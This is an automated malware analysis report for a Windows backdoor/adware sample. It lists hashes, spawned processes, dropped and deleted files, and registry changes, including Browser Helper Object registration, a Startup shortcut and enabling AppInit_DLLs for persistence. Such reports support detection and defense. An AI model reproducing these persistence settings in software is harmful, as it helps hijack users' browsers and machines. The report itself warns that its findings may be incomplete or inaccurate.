Gen:Variant.Adware.MPlug.38 (B) (Emsisoft), Gen:Variant.Adware.MPlug.38 (AdAware), Backdoor.Win32.PcClient.FD (Lavasoft MAS)Behaviour: Backdoor, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 874a6a15d18c264327f5c81ec98e2cf9
SHA1: b90f3dd3fba951e828a2a234121e3fe3916cc230
SHA256: 4e8aed5e3c3e1520d6e4a473dca4d0a5240c3a36ddbd4aa1ec2e7adfef5ea047
SSDeep: 12288:Bz5KLZTKN8Vgo 2PlRiTPYwfGnU/3dMvb:Bz4LZTKzOoTPYwfGnmMT
Size: 465920 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-04 03:38:00
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
regsvr32.exe:1932
regsvr32.exe:1980
ArmorerRise.xyz.exe:2036
%original file name%.exe:1176
%original file name%.exe:1988
%original file name%.exe:368
%original file name%.exe:1888
%original file name%.exe:188
%original file name%.exe:1016
rundll32.exe:1432
rundll32.exe:1196
The Backdoor injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process regsvr32.exe:1932 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)
The process ArmorerRise.xyz.exe:2036 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\TailCutter\TailCutter.dll (80814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
The process %original file name%.exe:1176 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6 (0 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (0 bytes)
The process %original file name%.exe:1988 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca (0 bytes)
The process %original file name%.exe:368 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\2.ini (0 bytes)
The process %original file name%.exe:1888 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7 (0 bytes)
The process %original file name%.exe:188 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)
The Backdoor deletes the following file(s):
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1 (0 bytes)
The process %original file name%.exe:1016 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
%Program Files%\Chime\Chime.exe (1504 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
%Program Files%\Chime\Chime.dat (5 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (0 bytes)
Registry activity
The process regsvr32.exe:1932 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0]
"(Default)" = "IEPluginLib"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6942a161-f713-42a7-a4aa-3bafc71fc8a6}" = "1"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"Version" = "1.0"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9]
"(Default)" = "BrrOwsiNGclEarly"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\0\win32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CurVer]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\ProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\VersionIndependentProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}]
"(Default)" = "IRegistry"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"Version" = "1.0"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\HELPDIR]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}]
"(Default)" = "IRuntime"
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_]
"(Default)" = "BrrOwsiNGclEarly"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 23 59 E0 34 27 93 FA 50 40 84 2D 22 09 F9 23"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}]
"(Default)" = "IPlaghinMein"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\Programmable]
"(Default)" = ""
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}]
"(Default)" = "ILocalStorage"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"
The process regsvr32.exe:1980 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\0\win32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0]
"(Default)" = "IEPluginLib"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\ProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\VersionIndependentProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}]
"(Default)" = "IPlaghinMein"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_]
"(Default)" = "WWhiteCouPooni"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}]
"(Default)" = "ILocalStorage"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}]
"(Default)" = "IRegistry"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9]
"(Default)" = "WWhiteCouPooni"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\Programmable]
"(Default)" = ""
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D3 10 D1 CD AA 10 F1 E6 87 98 BE 13 27 48 F6"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}]
"(Default)" = "IRuntime"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\HELPDIR]
"(Default)" = "%Program Files%\WWhiteCouPooni"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CurVer]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6dd13515-e089-4fae-8645-2fa8c57153de}" = "1"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"
"NoExplorer" = "1"
The process ArmorerRise.xyz.exe:2036 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un /uq"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"fe94ce1e" = "V/////%%"
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Publisher" = "ArmorerRise"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"3c09c42b" = "///%"
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoRepair" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"bbf88800" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"DisplayName" = "ArmorerRise"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoModify" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"State" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Cache" = "9428760297565573948"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"State" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"8b9e4cbc" = "V/////%%"
